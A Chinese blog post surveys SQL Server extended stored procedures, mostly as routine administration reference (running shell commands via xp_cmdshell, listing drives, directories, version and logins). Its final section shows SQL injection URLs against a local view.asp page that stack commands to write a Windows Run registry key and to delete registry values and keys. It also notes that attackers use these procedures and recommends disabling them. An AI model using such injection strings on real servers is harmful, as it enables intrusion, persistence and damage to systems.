sql server 里面提供了丰富的系统存储过程来辅助我们管理数据库以及开发。今天分享介绍一些常用的数据库扩展存储过程
xp_cmdshell
这个大家都比较熟悉了,使用xp_cmdshell 可以在连接sql server 的时候可以执行doc 命令
最简单一个例子EXEC master.sys.xp_cmdshell 'dir D:' 获取D 盘下面的目录。当然这个D: 是服务器上面的,不是本地电脑的。
所以有时候可以使用 xp_cmdshell 配合作业都角度使用执行bcp等命令来导入导出数据,也是很方便的。
但是使用的过程中,有下面几点留意一下
1 首次使用的时候,需要使用 EXEC sys.sp_configure @configname = 'xp_cmdshell',@configvalue = 1 来启用xp_cmdshell ,默认情况下,sql server 是禁用本功能的
2 可以使用 no_output 来忽略输出结果。
3 注意权限问题,注意非管理员账号的用户使用xp_cmdshell 。
xp_logininfo
这个返回的是服务器windows 用户和windows 组的信息
msdn上面写着这个存储过程具有3个参数 @acctname ,@option ,@privilege
燃鹅不知道是我测试的问题还是本身这个存储过程只有1个参数,@option 和 @privilege 传入进去都是无效的。
使用方法
EXEC master.sys.xp_logininfo
或者 EXEC master.sys.xp_logininfo @acctname = 'GINLATOPGin' 加上个账号名还是ok的
xp_msver
这个是返回服务器的版本消息。
调用方法可以使用
EXEC master..xp_msver
或者 EXEC master..xp_msver 'ProductName' --这个可以是上面的结果集返回的任意一个Name 的值,假如找不到,就会返回空结果集
xp_sprintf
这个扩展存储过程看起来就有点像入门写C语言的printf 函数了。燃鹅即时这样,我认为其实用到它的机会并不多。大部分使用的场景如下
DECLARE @i VARCHAR(20) = 1,
@j varchar(50) = 'ajofen',
@s VARCHAR(80)
EXEC master..xp_sprintf @s OUTPUT,'there are two varaint one is %s and another is %s ',@i,@j
PRINT @s
坑爹的是,这个存储过程的参数只支持字符型的……并且如果这样搞的话,使用 +来拼接字符串也ok了,所以也只是介绍一下?(?_?)?
xp_sscanf
这个扩展存储过程是对插入的字符串变量进行格式化取值。
DECLARE @i VARHAR(50) = 1,
@j varchar(50) ,
@s VARCHAR(80)
EXEC master..xp_sscanf '3 + 31 = 34','%s + %s =34',@i OUTPUT,@s OUTPUT
SELECT @i,@j,@s
补充:
--获得MS SQL的版本号
execute master..sp_msgetversion
--得到硬盘文件信息
--参数说明:目录名,目录深度,是否显示文件
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
--列出服务器上安装的所有OLEDB提供的程序
execute master..xp_enum_oledb_providers
--列出服务器上安装的所有代码页
execute master..xp_enumcodepages
--列出服务器上配置的dsn
execute master..xp_enumdsn
--列出sql server错误日志列表,最后更新时间
execute master..xp_enumerrorlogs
--列出服务器上所有windows本地组
execute master..xp_enumgroups
--检测文件存在性
execute master..xp_fileexist 'c:/a.bak'
declare @flag int
exec master..xp_fileexist 'c:/abc.bak',@flag out
if @flag=1
begin
print 'exist'
end
else
begin
print 'no exist'
end
--列出服务器上固定驱动器,以及每个驱动器的可用空间
execute master..xp_fixeddrives
--得到当前sql server服务器的计算机名称
execute master..xp_getnetname
--列出当前错误日志的具体内容
EXEC [master].[dbo].[xp_readerrorlog]
--列出指定目录的所有下一级子目录
EXEC [master].[dbo].[xp_subdirs] 'c:/WINNT'
---列出驱动器的名称
--以字节为单位的空闲空间(low free)
--以驱动器类型:软驱(1),硬盘(2),cd-rom(8)
EXEC [master].[dbo].[xp_availablemedia]
--效果如下:
name low free high free media type
C:/ 1270386688 0 2
D:/ 1726824448 2 2
E:/ 875053056 10 2
F:/ 0 0 8
还有在[master].[dbo].[sp_addlogin]里面有加密函数pwdencrypt,大家感兴趣可以试试
SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,
在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
http://127.0.0.1/view.asp?id=165
存在mssql的sql注入,那么
xp_regwrite 写入注册表
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
http://127.0.0.1/view.asp?id=165;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/run','TestValueName','reg_sz','hello'
注意值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName'
xp_regdeletekey 删除键,包括该键下所有值
使用方法:
http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey'
好,本次分享在这里结束了。下次看看再找一下。或者大家补充一下